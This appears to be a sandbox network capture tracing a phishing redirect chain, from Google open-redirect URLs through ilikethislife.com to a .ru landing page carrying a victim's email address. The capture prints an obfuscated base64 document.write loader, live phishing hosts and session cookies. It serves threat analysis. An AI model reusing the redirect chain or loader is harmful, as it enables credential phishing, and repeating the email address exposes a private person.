                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
                                                                  2025-01-13 21:52:23 UTC1944INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-9sx1FSqGCSP3khkBpsbSlA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:52:23 GMT
                                                                  Server: gws
                                                                  Content-Length: 1568
                                                                  X-XSS-Protection: 0
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:52:23 UTC1568INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 2e 2f 2f 2f 2f 61 6d 70 2f 73 2f 69 6c 69 6b 65 74 68 69 73 6c 69 66 65 2e 63 6f 6d 2f 77 69 6e 6e 65 72 2f 30 53 66 4e 6a 2f 59 32 4e 31 5a 47 52 35 63 6d 56 41 63 33 6c 6d
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lm


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449747142.250.185.2284435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:23 UTC2225OUTGET /url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWl [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
                                                                  2025-01-13 21:52:24 UTC1936INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnp [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-fWNm_fZDd4SXkYWX0BIOSg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:52:24 GMT
                                                                  Server: gws
                                                                  Content-Length: 1560
                                                                  X-XSS-Protection: 0
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:52:24 UTC1560INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 2f 2f 2f 61 6d 70 2f 73 2f 69 6c 69 6b 65 74 68 69 73 6c 69 66 65 2e 63 6f 6d 2f 77 69 6e 6e 65 72 2f 30 53 66 4e 6a 2f 59 32 4e 31 5a 47 52 35 63 6d 56 41 63 33 6c 6d 64 47 4e 76 4c 6d 4e 76
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNv


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449748142.250.185.2284435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:24 UTC2217OUTGET ////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3Z [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
                                                                  2025-01-13 21:52:25 UTC881INHTTP/1.1 302 Found
                                                                  Location: https://ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==
                                                                  Cache-Control: private
                                                                  X-Robots-Tag: noindex
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-teTVHav5pm1Gy3Y0aCTFjg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:52:24 GMT
                                                                  Server: gws
                                                                  Content-Length: 264
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:52:25 UTC264INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 69 6c 69 6b 65 74 68 69 73 6c 69 66 65 2e 63 6f 6d 2f 77 69 6e 6e 65 72 2f 30 53 66 4e 6a 2f 59 32 4e 31 5a 47 52 35 63 6d 56 41 63 33 6c 6d 64 47 4e 76 4c 6d 4e 76 62 51 3d 3d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==">here</A>.</BODY>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449749103.83.194.554435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:25 UTC701OUTGET /winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ== HTTP/1.1
                                                                  Host: ilikethislife.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:25 UTC219INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:25 GMT
                                                                  Server: Apache
                                                                  refresh: 0;url=https://rFLL.yordickyel.ru/16E/#Mccuddyre@syftco.com
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=UTF-8


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449752104.21.92.2104435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:26 UTC688OUTGET /16E/ HTTP/1.1
                                                                  Host: rfll.yordickyel.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-Dest: document
                                                                  Referer: https://ilikethislife.com/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:27 UTC1240INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPLYrNsNVwKCYlEKQLMTJY7gIApmXtV3xC01rhnl8IJgoUw0E0ZejLG14raPDskN%2Bj1CqJ06Y1ADX6U4RMzge4j02M0OOv4lmybnCyaUWmJfJMm9fZ0r9IX7EzYQRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=73973&min_rtt=73796&rtt_var=27800&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1595&delivery_rate=38592&cwnd=230&unsent_bytes=0&cid=cfc611d7e64207fc&ts=288&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6ImRzRFZ2cUx3cWpFSHFxaFQ0SlVDVEE9PSIsInZhbHVlIjoiSkYrQ05wR3JlZy85QUFNTWIyT2N2SlBVZWdjaHEvTzdIYjRmaXEwTzNiUWRjaHpJMzRuWFZ6THBSblhZOS9NcHA5VXh3dDNqY3FXd1h2OEJVMk84Mm1hdHVhMG9xU1p5bmpPckxoRUVvSWVTWXlCZGdQNlRDYmhJbzFRN2tIbEciLCJtYWMiOiI5ODE2NmY4N2VjZWFkNTkxM2NhM2I1NzFkOWNkMmYzYmRmMTZlMzVkM2FhZjJhYzdiZTIyZjYzZGNjNjZiNDFmIiwidGFnIjoiIn0%3D; expires=Mon, 13-Jan-2025 23:52:27 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-01-13 21:52:27 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 6c 33 55 45 78 4a 5a 55 35 4e 52 32 68 4d 4d 57 68 79 57 6c 64 42 4c 30 78 79 51 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 6d 4e 4b 4d 58 5a 53 4f 56 46 6e 56 47 68 6a 54 6c 4e 4c 4c 33 51 33 4e 6e 49 34 5a 57 68 35 64 57 52 6e 62 58 42 48 4f 54 68 46 55 57 78 4d 57 57 74 42 54 58 64 57 52 6a 4d 32 54 6d 56 59 52 32 52 50 57 57 55 78 64 46 68 30 54 7a 64 6b 52 54 68 34 65 55 73 7a 52 7a 6c 54 61 48 64 51 63 48 56 36 61 54 64 42 4e 6b 56 52 4d 69 39 73 4f 58 52 4f 4f 48 52 46 4f 45 70 36 57 54 42 5a 4e 31 52 4d 64 6e 70 73 4e 30 6c 34 4d 55 56 54 52 53 73 32 63 6c 42 35 56 57 39 6e 55 6c 46 70 56 47 70 52 4c 32 59 7a 4d 56 41
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ijl3UExJZU5NR2hMMWhyWldBL0xyQXc9PSIsInZhbHVlIjoiYmNKMXZSOVFnVGhjTlNLL3Q3NnI4ZWh5dWRnbXBHOThFUWxMWWtBTXdWRjM2TmVYR2RPWWUxdFh0TzdkRTh4eUszRzlTaHdQcHV6aTdBNkVRMi9sOXROOHRFOEp6WTBZN1RMdnpsN0l4MUVTRSs2clB5VW9nUlFpVGpRL2YzMVA
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 34 65 30 62 0d 0a 3c 21 2d 2d 20 49 66 20 79 6f 75 20 72 65 61 6c 6c 79 20 6c 6f 6f 6b 20 63 6c 6f 73 65 6c 79 2c 20 6d 6f 73 74 20 6f 76 65 72 6e 69 67 68 74 20 73 75 63 63 65 73 73 65 73 20 74 6f 6f 6b 20 61 20 6c 6f 6e 67 20 74 69 6d 65 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 79 52 6b 78 4d 4c 6e 6c 76 63 6d 52 70 59 32 74 35 5a 57 77 75 63 6e 55 76 4d 54 5a 46 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35
                                                                  Data Ascii: 4e0b... If you really look closely, most overnight successes took a long time. --><script>if(atob("aHR0cHM6Ly9yRkxMLnlvcmRpY2t5ZWwucnUvMTZFLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5
                                                                  2025-01-13 21:52:27 UTC1369INData Raw: 57 30 37 66 51 30 4b 49 30 4a 72 54 6c 4e 61 61 33 4e 57 65 57 6b 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 7a 4a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c
                                                                  Data Ascii: W07fQ0KI0JrTlNaa3NWeWkuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMzJweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxl
